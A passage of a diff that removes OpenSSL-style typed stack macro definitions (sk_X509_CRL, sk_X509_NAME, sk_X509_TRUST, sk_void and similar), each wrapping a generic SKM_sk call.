-#define sk_X509_CRL_new_null() SKM_sk_new_null(X509_CRL)
-#define sk_X509_CRL_free(st) SKM_sk_free(X509_CRL, (st))
-#define sk_X509_CRL_num(st) SKM_sk_num(X509_CRL, (st))
-#define sk_X509_CRL_value(st, i) SKM_sk_value(X509_CRL, (st), (i))
-#define sk_X509_CRL_set(st, i, val) SKM_sk_set(X509_CRL, (st), (i), (val))
-#define sk_X509_CRL_zero(st) SKM_sk_zero(X509_CRL, (st))
-#define sk_X509_CRL_push(st, val) SKM_sk_push(X509_CRL, (st), (val))
-#define sk_X509_CRL_unshift(st, val) SKM_sk_unshift(X509_CRL, (st), (val))
-#define sk_X509_CRL_find(st, val) SKM_sk_find(X509_CRL, (st), (val))
-#define sk_X509_CRL_find_ex(st, val) SKM_sk_find_ex(X509_CRL, (st), (val))
-#define sk_X509_CRL_delete(st, i) SKM_sk_delete(X509_CRL, (st), (i))
-#define sk_X509_CRL_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_CRL, (st), (ptr))
-#define sk_X509_CRL_insert(st, val, i) SKM_sk_insert(X509_CRL, (st), (val), (i))
-#define sk_X509_CRL_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_CRL, (st), (cmp))
-#define sk_X509_CRL_dup(st) SKM_sk_dup(X509_CRL, st)
-#define sk_X509_CRL_pop_free(st, free_func) SKM_sk_pop_free(X509_CRL, (st), (free_func))
-#define sk_X509_CRL_shift(st) SKM_sk_shift(X509_CRL, (st))
-#define sk_X509_CRL_pop(st) SKM_sk_pop(X509_CRL, (st))
-#define sk_X509_CRL_sort(st) SKM_sk_sort(X509_CRL, (st))
-#define sk_X509_CRL_is_sorted(st) SKM_sk_is_sorted(X509_CRL, (st))
-
-#define sk_X509_EXTENSION_new(cmp) SKM_sk_new(X509_EXTENSION, (cmp))
-#define sk_X509_EXTENSION_new_null() SKM_sk_new_null(X509_EXTENSION)
-#define sk_X509_EXTENSION_free(st) SKM_sk_free(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_num(st) SKM_sk_num(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_value(st, i) SKM_sk_value(X509_EXTENSION, (st), (i))
-#define sk_X509_EXTENSION_set(st, i, val) SKM_sk_set(X509_EXTENSION, (st), (i), (val))
-#define sk_X509_EXTENSION_zero(st) SKM_sk_zero(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_push(st, val) SKM_sk_push(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_unshift(st, val) SKM_sk_unshift(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_find(st, val) SKM_sk_find(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_find_ex(st, val) SKM_sk_find_ex(X509_EXTENSION, (st), (val))
-#define sk_X509_EXTENSION_delete(st, i) SKM_sk_delete(X509_EXTENSION, (st), (i))
-#define sk_X509_EXTENSION_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_EXTENSION, (st), (ptr))
-#define sk_X509_EXTENSION_insert(st, val, i) SKM_sk_insert(X509_EXTENSION, (st), (val), (i))
-#define sk_X509_EXTENSION_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_EXTENSION, (st), (cmp))
-#define sk_X509_EXTENSION_dup(st) SKM_sk_dup(X509_EXTENSION, st)
-#define sk_X509_EXTENSION_pop_free(st, free_func) SKM_sk_pop_free(X509_EXTENSION, (st), (free_func))
-#define sk_X509_EXTENSION_shift(st) SKM_sk_shift(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_pop(st) SKM_sk_pop(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_sort(st) SKM_sk_sort(X509_EXTENSION, (st))
-#define sk_X509_EXTENSION_is_sorted(st) SKM_sk_is_sorted(X509_EXTENSION, (st))
-
-#define sk_X509_INFO_new(cmp) SKM_sk_new(X509_INFO, (cmp))
-#define sk_X509_INFO_new_null() SKM_sk_new_null(X509_INFO)
-#define sk_X509_INFO_free(st) SKM_sk_free(X509_INFO, (st))
-#define sk_X509_INFO_num(st) SKM_sk_num(X509_INFO, (st))
-#define sk_X509_INFO_value(st, i) SKM_sk_value(X509_INFO, (st), (i))
-#define sk_X509_INFO_set(st, i, val) SKM_sk_set(X509_INFO, (st), (i), (val))
-#define sk_X509_INFO_zero(st) SKM_sk_zero(X509_INFO, (st))
-#define sk_X509_INFO_push(st, val) SKM_sk_push(X509_INFO, (st), (val))
-#define sk_X509_INFO_unshift(st, val) SKM_sk_unshift(X509_INFO, (st), (val))
-#define sk_X509_INFO_find(st, val) SKM_sk_find(X509_INFO, (st), (val))
-#define sk_X509_INFO_find_ex(st, val) SKM_sk_find_ex(X509_INFO, (st), (val))
-#define sk_X509_INFO_delete(st, i) SKM_sk_delete(X509_INFO, (st), (i))
-#define sk_X509_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_INFO, (st), (ptr))
-#define sk_X509_INFO_insert(st, val, i) SKM_sk_insert(X509_INFO, (st), (val), (i))
-#define sk_X509_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_INFO, (st), (cmp))
-#define sk_X509_INFO_dup(st) SKM_sk_dup(X509_INFO, st)
-#define sk_X509_INFO_pop_free(st, free_func) SKM_sk_pop_free(X509_INFO, (st), (free_func))
-#define sk_X509_INFO_shift(st) SKM_sk_shift(X509_INFO, (st))
-#define sk_X509_INFO_pop(st) SKM_sk_pop(X509_INFO, (st))
-#define sk_X509_INFO_sort(st) SKM_sk_sort(X509_INFO, (st))
-#define sk_X509_INFO_is_sorted(st) SKM_sk_is_sorted(X509_INFO, (st))
-
-#define sk_X509_LOOKUP_new(cmp) SKM_sk_new(X509_LOOKUP, (cmp))
-#define sk_X509_LOOKUP_new_null() SKM_sk_new_null(X509_LOOKUP)
-#define sk_X509_LOOKUP_free(st) SKM_sk_free(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_num(st) SKM_sk_num(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_value(st, i) SKM_sk_value(X509_LOOKUP, (st), (i))
-#define sk_X509_LOOKUP_set(st, i, val) SKM_sk_set(X509_LOOKUP, (st), (i), (val))
-#define sk_X509_LOOKUP_zero(st) SKM_sk_zero(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_push(st, val) SKM_sk_push(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_unshift(st, val) SKM_sk_unshift(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_find(st, val) SKM_sk_find(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_find_ex(st, val) SKM_sk_find_ex(X509_LOOKUP, (st), (val))
-#define sk_X509_LOOKUP_delete(st, i) SKM_sk_delete(X509_LOOKUP, (st), (i))
-#define sk_X509_LOOKUP_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_LOOKUP, (st), (ptr))
-#define sk_X509_LOOKUP_insert(st, val, i) SKM_sk_insert(X509_LOOKUP, (st), (val), (i))
-#define sk_X509_LOOKUP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_LOOKUP, (st), (cmp))
-#define sk_X509_LOOKUP_dup(st) SKM_sk_dup(X509_LOOKUP, st)
-#define sk_X509_LOOKUP_pop_free(st, free_func) SKM_sk_pop_free(X509_LOOKUP, (st), (free_func))
-#define sk_X509_LOOKUP_shift(st) SKM_sk_shift(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_pop(st) SKM_sk_pop(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_sort(st) SKM_sk_sort(X509_LOOKUP, (st))
-#define sk_X509_LOOKUP_is_sorted(st) SKM_sk_is_sorted(X509_LOOKUP, (st))
-
-#define sk_X509_NAME_new(cmp) SKM_sk_new(X509_NAME, (cmp))
-#define sk_X509_NAME_new_null() SKM_sk_new_null(X509_NAME)
-#define sk_X509_NAME_free(st) SKM_sk_free(X509_NAME, (st))
-#define sk_X509_NAME_num(st) SKM_sk_num(X509_NAME, (st))
-#define sk_X509_NAME_value(st, i) SKM_sk_value(X509_NAME, (st), (i))
-#define sk_X509_NAME_set(st, i, val) SKM_sk_set(X509_NAME, (st), (i), (val))
-#define sk_X509_NAME_zero(st) SKM_sk_zero(X509_NAME, (st))
-#define sk_X509_NAME_push(st, val) SKM_sk_push(X509_NAME, (st), (val))
-#define sk_X509_NAME_unshift(st, val) SKM_sk_unshift(X509_NAME, (st), (val))
-#define sk_X509_NAME_find(st, val) SKM_sk_find(X509_NAME, (st), (val))
-#define sk_X509_NAME_find_ex(st, val) SKM_sk_find_ex(X509_NAME, (st), (val))
-#define sk_X509_NAME_delete(st, i) SKM_sk_delete(X509_NAME, (st), (i))
-#define sk_X509_NAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_NAME, (st), (ptr))
-#define sk_X509_NAME_insert(st, val, i) SKM_sk_insert(X509_NAME, (st), (val), (i))
-#define sk_X509_NAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_NAME, (st), (cmp))
-#define sk_X509_NAME_dup(st) SKM_sk_dup(X509_NAME, st)
-#define sk_X509_NAME_pop_free(st, free_func) SKM_sk_pop_free(X509_NAME, (st), (free_func))
-#define sk_X509_NAME_shift(st) SKM_sk_shift(X509_NAME, (st))
-#define sk_X509_NAME_pop(st) SKM_sk_pop(X509_NAME, (st))
-#define sk_X509_NAME_sort(st) SKM_sk_sort(X509_NAME, (st))
-#define sk_X509_NAME_is_sorted(st) SKM_sk_is_sorted(X509_NAME, (st))
-
-#define sk_X509_NAME_ENTRY_new(cmp) SKM_sk_new(X509_NAME_ENTRY, (cmp))
-#define sk_X509_NAME_ENTRY_new_null() SKM_sk_new_null(X509_NAME_ENTRY)
-#define sk_X509_NAME_ENTRY_free(st) SKM_sk_free(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_num(st) SKM_sk_num(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_value(st, i) SKM_sk_value(X509_NAME_ENTRY, (st), (i))
-#define sk_X509_NAME_ENTRY_set(st, i, val) SKM_sk_set(X509_NAME_ENTRY, (st), (i), (val))
-#define sk_X509_NAME_ENTRY_zero(st) SKM_sk_zero(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_push(st, val) SKM_sk_push(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_unshift(st, val) SKM_sk_unshift(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_find(st, val) SKM_sk_find(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_find_ex(st, val) SKM_sk_find_ex(X509_NAME_ENTRY, (st), (val))
-#define sk_X509_NAME_ENTRY_delete(st, i) SKM_sk_delete(X509_NAME_ENTRY, (st), (i))
-#define sk_X509_NAME_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_NAME_ENTRY, (st), (ptr))
-#define sk_X509_NAME_ENTRY_insert(st, val, i) SKM_sk_insert(X509_NAME_ENTRY, (st), (val), (i))
-#define sk_X509_NAME_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_NAME_ENTRY, (st), (cmp))
-#define sk_X509_NAME_ENTRY_dup(st) SKM_sk_dup(X509_NAME_ENTRY, st)
-#define sk_X509_NAME_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(X509_NAME_ENTRY, (st), (free_func))
-#define sk_X509_NAME_ENTRY_shift(st) SKM_sk_shift(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_pop(st) SKM_sk_pop(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_sort(st) SKM_sk_sort(X509_NAME_ENTRY, (st))
-#define sk_X509_NAME_ENTRY_is_sorted(st) SKM_sk_is_sorted(X509_NAME_ENTRY, (st))
-
-#define sk_X509_OBJECT_new(cmp) SKM_sk_new(X509_OBJECT, (cmp))
-#define sk_X509_OBJECT_new_null() SKM_sk_new_null(X509_OBJECT)
-#define sk_X509_OBJECT_free(st) SKM_sk_free(X509_OBJECT, (st))
-#define sk_X509_OBJECT_num(st) SKM_sk_num(X509_OBJECT, (st))
-#define sk_X509_OBJECT_value(st, i) SKM_sk_value(X509_OBJECT, (st), (i))
-#define sk_X509_OBJECT_set(st, i, val) SKM_sk_set(X509_OBJECT, (st), (i), (val))
-#define sk_X509_OBJECT_zero(st) SKM_sk_zero(X509_OBJECT, (st))
-#define sk_X509_OBJECT_push(st, val) SKM_sk_push(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_unshift(st, val) SKM_sk_unshift(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_find(st, val) SKM_sk_find(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_find_ex(st, val) SKM_sk_find_ex(X509_OBJECT, (st), (val))
-#define sk_X509_OBJECT_delete(st, i) SKM_sk_delete(X509_OBJECT, (st), (i))
-#define sk_X509_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_OBJECT, (st), (ptr))
-#define sk_X509_OBJECT_insert(st, val, i) SKM_sk_insert(X509_OBJECT, (st), (val), (i))
-#define sk_X509_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_OBJECT, (st), (cmp))
-#define sk_X509_OBJECT_dup(st) SKM_sk_dup(X509_OBJECT, st)
-#define sk_X509_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(X509_OBJECT, (st), (free_func))
-#define sk_X509_OBJECT_shift(st) SKM_sk_shift(X509_OBJECT, (st))
-#define sk_X509_OBJECT_pop(st) SKM_sk_pop(X509_OBJECT, (st))
-#define sk_X509_OBJECT_sort(st) SKM_sk_sort(X509_OBJECT, (st))
-#define sk_X509_OBJECT_is_sorted(st) SKM_sk_is_sorted(X509_OBJECT, (st))
-
-#define sk_X509_POLICY_DATA_new(cmp) SKM_sk_new(X509_POLICY_DATA, (cmp))
-#define sk_X509_POLICY_DATA_new_null() SKM_sk_new_null(X509_POLICY_DATA)
-#define sk_X509_POLICY_DATA_free(st) SKM_sk_free(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_num(st) SKM_sk_num(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_value(st, i) SKM_sk_value(X509_POLICY_DATA, (st), (i))
-#define sk_X509_POLICY_DATA_set(st, i, val) SKM_sk_set(X509_POLICY_DATA, (st), (i), (val))
-#define sk_X509_POLICY_DATA_zero(st) SKM_sk_zero(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_push(st, val) SKM_sk_push(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_unshift(st, val) SKM_sk_unshift(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_find(st, val) SKM_sk_find(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_find_ex(st, val) SKM_sk_find_ex(X509_POLICY_DATA, (st), (val))
-#define sk_X509_POLICY_DATA_delete(st, i) SKM_sk_delete(X509_POLICY_DATA, (st), (i))
-#define sk_X509_POLICY_DATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_POLICY_DATA, (st), (ptr))
-#define sk_X509_POLICY_DATA_insert(st, val, i) SKM_sk_insert(X509_POLICY_DATA, (st), (val), (i))
-#define sk_X509_POLICY_DATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_POLICY_DATA, (st), (cmp))
-#define sk_X509_POLICY_DATA_dup(st) SKM_sk_dup(X509_POLICY_DATA, st)
-#define sk_X509_POLICY_DATA_pop_free(st, free_func) SKM_sk_pop_free(X509_POLICY_DATA, (st), (free_func))
-#define sk_X509_POLICY_DATA_shift(st) SKM_sk_shift(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_pop(st) SKM_sk_pop(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_sort(st) SKM_sk_sort(X509_POLICY_DATA, (st))
-#define sk_X509_POLICY_DATA_is_sorted(st) SKM_sk_is_sorted(X509_POLICY_DATA, (st))
-
-#define sk_X509_POLICY_NODE_new(cmp) SKM_sk_new(X509_POLICY_NODE, (cmp))
-#define sk_X509_POLICY_NODE_new_null() SKM_sk_new_null(X509_POLICY_NODE)
-#define sk_X509_POLICY_NODE_free(st) SKM_sk_free(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_num(st) SKM_sk_num(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_value(st, i) SKM_sk_value(X509_POLICY_NODE, (st), (i))
-#define sk_X509_POLICY_NODE_set(st, i, val) SKM_sk_set(X509_POLICY_NODE, (st), (i), (val))
-#define sk_X509_POLICY_NODE_zero(st) SKM_sk_zero(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_push(st, val) SKM_sk_push(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_unshift(st, val) SKM_sk_unshift(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_find(st, val) SKM_sk_find(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_find_ex(st, val) SKM_sk_find_ex(X509_POLICY_NODE, (st), (val))
-#define sk_X509_POLICY_NODE_delete(st, i) SKM_sk_delete(X509_POLICY_NODE, (st), (i))
-#define sk_X509_POLICY_NODE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_POLICY_NODE, (st), (ptr))
-#define sk_X509_POLICY_NODE_insert(st, val, i) SKM_sk_insert(X509_POLICY_NODE, (st), (val), (i))
-#define sk_X509_POLICY_NODE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_POLICY_NODE, (st), (cmp))
-#define sk_X509_POLICY_NODE_dup(st) SKM_sk_dup(X509_POLICY_NODE, st)
-#define sk_X509_POLICY_NODE_pop_free(st, free_func) SKM_sk_pop_free(X509_POLICY_NODE, (st), (free_func))
-#define sk_X509_POLICY_NODE_shift(st) SKM_sk_shift(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_pop(st) SKM_sk_pop(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_sort(st) SKM_sk_sort(X509_POLICY_NODE, (st))
-#define sk_X509_POLICY_NODE_is_sorted(st) SKM_sk_is_sorted(X509_POLICY_NODE, (st))
-
-#define sk_X509_PURPOSE_new(cmp) SKM_sk_new(X509_PURPOSE, (cmp))
-#define sk_X509_PURPOSE_new_null() SKM_sk_new_null(X509_PURPOSE)
-#define sk_X509_PURPOSE_free(st) SKM_sk_free(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_num(st) SKM_sk_num(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_value(st, i) SKM_sk_value(X509_PURPOSE, (st), (i))
-#define sk_X509_PURPOSE_set(st, i, val) SKM_sk_set(X509_PURPOSE, (st), (i), (val))
-#define sk_X509_PURPOSE_zero(st) SKM_sk_zero(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_push(st, val) SKM_sk_push(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_unshift(st, val) SKM_sk_unshift(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_find(st, val) SKM_sk_find(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_find_ex(st, val) SKM_sk_find_ex(X509_PURPOSE, (st), (val))
-#define sk_X509_PURPOSE_delete(st, i) SKM_sk_delete(X509_PURPOSE, (st), (i))
-#define sk_X509_PURPOSE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_PURPOSE, (st), (ptr))
-#define sk_X509_PURPOSE_insert(st, val, i) SKM_sk_insert(X509_PURPOSE, (st), (val), (i))
-#define sk_X509_PURPOSE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_PURPOSE, (st), (cmp))
-#define sk_X509_PURPOSE_dup(st) SKM_sk_dup(X509_PURPOSE, st)
-#define sk_X509_PURPOSE_pop_free(st, free_func) SKM_sk_pop_free(X509_PURPOSE, (st), (free_func))
-#define sk_X509_PURPOSE_shift(st) SKM_sk_shift(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_pop(st) SKM_sk_pop(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_sort(st) SKM_sk_sort(X509_PURPOSE, (st))
-#define sk_X509_PURPOSE_is_sorted(st) SKM_sk_is_sorted(X509_PURPOSE, (st))
-
-#define sk_X509_REVOKED_new(cmp) SKM_sk_new(X509_REVOKED, (cmp))
-#define sk_X509_REVOKED_new_null() SKM_sk_new_null(X509_REVOKED)
-#define sk_X509_REVOKED_free(st) SKM_sk_free(X509_REVOKED, (st))
-#define sk_X509_REVOKED_num(st) SKM_sk_num(X509_REVOKED, (st))
-#define sk_X509_REVOKED_value(st, i) SKM_sk_value(X509_REVOKED, (st), (i))
-#define sk_X509_REVOKED_set(st, i, val) SKM_sk_set(X509_REVOKED, (st), (i), (val))
-#define sk_X509_REVOKED_zero(st) SKM_sk_zero(X509_REVOKED, (st))
-#define sk_X509_REVOKED_push(st, val) SKM_sk_push(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_unshift(st, val) SKM_sk_unshift(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_find(st, val) SKM_sk_find(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_find_ex(st, val) SKM_sk_find_ex(X509_REVOKED, (st), (val))
-#define sk_X509_REVOKED_delete(st, i) SKM_sk_delete(X509_REVOKED, (st), (i))
-#define sk_X509_REVOKED_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_REVOKED, (st), (ptr))
-#define sk_X509_REVOKED_insert(st, val, i) SKM_sk_insert(X509_REVOKED, (st), (val), (i))
-#define sk_X509_REVOKED_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_REVOKED, (st), (cmp))
-#define sk_X509_REVOKED_dup(st) SKM_sk_dup(X509_REVOKED, st)
-#define sk_X509_REVOKED_pop_free(st, free_func) SKM_sk_pop_free(X509_REVOKED, (st), (free_func))
-#define sk_X509_REVOKED_shift(st) SKM_sk_shift(X509_REVOKED, (st))
-#define sk_X509_REVOKED_pop(st) SKM_sk_pop(X509_REVOKED, (st))
-#define sk_X509_REVOKED_sort(st) SKM_sk_sort(X509_REVOKED, (st))
-#define sk_X509_REVOKED_is_sorted(st) SKM_sk_is_sorted(X509_REVOKED, (st))
-
-#define sk_X509_TRUST_new(cmp) SKM_sk_new(X509_TRUST, (cmp))
-#define sk_X509_TRUST_new_null() SKM_sk_new_null(X509_TRUST)
-#define sk_X509_TRUST_free(st) SKM_sk_free(X509_TRUST, (st))
-#define sk_X509_TRUST_num(st) SKM_sk_num(X509_TRUST, (st))
-#define sk_X509_TRUST_value(st, i) SKM_sk_value(X509_TRUST, (st), (i))
-#define sk_X509_TRUST_set(st, i, val) SKM_sk_set(X509_TRUST, (st), (i), (val))
-#define sk_X509_TRUST_zero(st) SKM_sk_zero(X509_TRUST, (st))
-#define sk_X509_TRUST_push(st, val) SKM_sk_push(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_unshift(st, val) SKM_sk_unshift(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_find(st, val) SKM_sk_find(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_find_ex(st, val) SKM_sk_find_ex(X509_TRUST, (st), (val))
-#define sk_X509_TRUST_delete(st, i) SKM_sk_delete(X509_TRUST, (st), (i))
-#define sk_X509_TRUST_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_TRUST, (st), (ptr))
-#define sk_X509_TRUST_insert(st, val, i) SKM_sk_insert(X509_TRUST, (st), (val), (i))
-#define sk_X509_TRUST_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_TRUST, (st), (cmp))
-#define sk_X509_TRUST_dup(st) SKM_sk_dup(X509_TRUST, st)
-#define sk_X509_TRUST_pop_free(st, free_func) SKM_sk_pop_free(X509_TRUST, (st), (free_func))
-#define sk_X509_TRUST_shift(st) SKM_sk_shift(X509_TRUST, (st))
-#define sk_X509_TRUST_pop(st) SKM_sk_pop(X509_TRUST, (st))
-#define sk_X509_TRUST_sort(st) SKM_sk_sort(X509_TRUST, (st))
-#define sk_X509_TRUST_is_sorted(st) SKM_sk_is_sorted(X509_TRUST, (st))
-
-#define sk_X509_VERIFY_PARAM_new(cmp) SKM_sk_new(X509_VERIFY_PARAM, (cmp))
-#define sk_X509_VERIFY_PARAM_new_null() SKM_sk_new_null(X509_VERIFY_PARAM)
-#define sk_X509_VERIFY_PARAM_free(st) SKM_sk_free(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_num(st) SKM_sk_num(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_value(st, i) SKM_sk_value(X509_VERIFY_PARAM, (st), (i))
-#define sk_X509_VERIFY_PARAM_set(st, i, val) SKM_sk_set(X509_VERIFY_PARAM, (st), (i), (val))
-#define sk_X509_VERIFY_PARAM_zero(st) SKM_sk_zero(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_push(st, val) SKM_sk_push(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_unshift(st, val) SKM_sk_unshift(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_find(st, val) SKM_sk_find(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_find_ex(st, val) SKM_sk_find_ex(X509_VERIFY_PARAM, (st), (val))
-#define sk_X509_VERIFY_PARAM_delete(st, i) SKM_sk_delete(X509_VERIFY_PARAM, (st), (i))
-#define sk_X509_VERIFY_PARAM_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_VERIFY_PARAM, (st), (ptr))
-#define sk_X509_VERIFY_PARAM_insert(st, val, i) SKM_sk_insert(X509_VERIFY_PARAM, (st), (val), (i))
-#define sk_X509_VERIFY_PARAM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_VERIFY_PARAM, (st), (cmp))
-#define sk_X509_VERIFY_PARAM_dup(st) SKM_sk_dup(X509_VERIFY_PARAM, st)
-#define sk_X509_VERIFY_PARAM_pop_free(st, free_func) SKM_sk_pop_free(X509_VERIFY_PARAM, (st), (free_func))
-#define sk_X509_VERIFY_PARAM_shift(st) SKM_sk_shift(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_pop(st) SKM_sk_pop(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_sort(st) SKM_sk_sort(X509_VERIFY_PARAM, (st))
-#define sk_X509_VERIFY_PARAM_is_sorted(st) SKM_sk_is_sorted(X509_VERIFY_PARAM, (st))
-
-#define sk_nid_triple_new(cmp) SKM_sk_new(nid_triple, (cmp))
-#define sk_nid_triple_new_null() SKM_sk_new_null(nid_triple)
-#define sk_nid_triple_free(st) SKM_sk_free(nid_triple, (st))
-#define sk_nid_triple_num(st) SKM_sk_num(nid_triple, (st))
-#define sk_nid_triple_value(st, i) SKM_sk_value(nid_triple, (st), (i))
-#define sk_nid_triple_set(st, i, val) SKM_sk_set(nid_triple, (st), (i), (val))
-#define sk_nid_triple_zero(st) SKM_sk_zero(nid_triple, (st))
-#define sk_nid_triple_push(st, val) SKM_sk_push(nid_triple, (st), (val))
-#define sk_nid_triple_unshift(st, val) SKM_sk_unshift(nid_triple, (st), (val))
-#define sk_nid_triple_find(st, val) SKM_sk_find(nid_triple, (st), (val))
-#define sk_nid_triple_find_ex(st, val) SKM_sk_find_ex(nid_triple, (st), (val))
-#define sk_nid_triple_delete(st, i) SKM_sk_delete(nid_triple, (st), (i))
-#define sk_nid_triple_delete_ptr(st, ptr) SKM_sk_delete_ptr(nid_triple, (st), (ptr))
-#define sk_nid_triple_insert(st, val, i) SKM_sk_insert(nid_triple, (st), (val), (i))
-#define sk_nid_triple_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(nid_triple, (st), (cmp))
-#define sk_nid_triple_dup(st) SKM_sk_dup(nid_triple, st)
-#define sk_nid_triple_pop_free(st, free_func) SKM_sk_pop_free(nid_triple, (st), (free_func))
-#define sk_nid_triple_shift(st) SKM_sk_shift(nid_triple, (st))
-#define sk_nid_triple_pop(st) SKM_sk_pop(nid_triple, (st))
-#define sk_nid_triple_sort(st) SKM_sk_sort(nid_triple, (st))
-#define sk_nid_triple_is_sorted(st) SKM_sk_is_sorted(nid_triple, (st))
-
-#define sk_void_new(cmp) SKM_sk_new(void, (cmp))
-#define sk_void_new_null() SKM_sk_new_null(void)
-#define sk_void_free(st) SKM_sk_free(void, (st))
-#define sk_void_num(st) SKM_sk_num(void, (st))
-#define sk_void_value(st, i) SKM_sk_value(void, (st), (i))
-#define sk_void_set(st, i, val) SKM_sk_set(void, (st), (i), (val))
-#define sk_void_zero(st) SKM_sk_zero(void, (st))
-#define sk_void_push(st, val) SKM_sk_push(void, (st), (val))
-#define sk_void_unshift(st, val) SKM_sk_unshift(void, (st), (val))
-#define sk_void_find(st, val) SKM_sk_find(void, (st), (val))
-#define sk_void_find_ex(st, val) SKM_sk_find_ex(void, (st), (val))
-#define sk_void_delete(st, i) SKM_sk_delete(void, (st), (i))
-#define sk_void_delete_ptr(st, ptr) SKM_sk_delete_ptr(void, (st), (ptr))
-#define sk_void_insert(st, val, i) SKM_sk_insert(void, (st), (val), (i))
-#define sk_void_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(void, (st), (cmp))
-#define sk_void_dup(st) SKM_sk_dup(void, st)
-#define sk_void_pop_free(st, free_func) SKM_sk_pop_free(void, (st), (free_func))
-#define sk_void_shift(st) SKM_sk_shift(void, (st))
-#define sk_void_pop(st) SKM_sk_pop(void, (st))
-#define sk_void_sort(st) SKM_sk_sort(void, (st))
